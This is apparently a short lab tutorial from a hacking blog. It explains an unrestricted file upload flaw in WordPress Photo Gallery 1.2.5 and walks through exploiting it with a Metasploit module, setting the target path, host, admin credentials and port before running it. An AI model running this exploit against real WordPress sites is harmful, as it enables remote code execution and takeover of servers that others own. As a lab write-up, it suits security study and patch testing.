Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post () method in UploadHandler.php does not properly verify or sanitize user-uploaded files.
Exploit Targets
Photo Gallery Plugin, version 1.2.5.
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi /wordpress
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rport 80
msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit
The post Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload appeared first on Hacking Articles.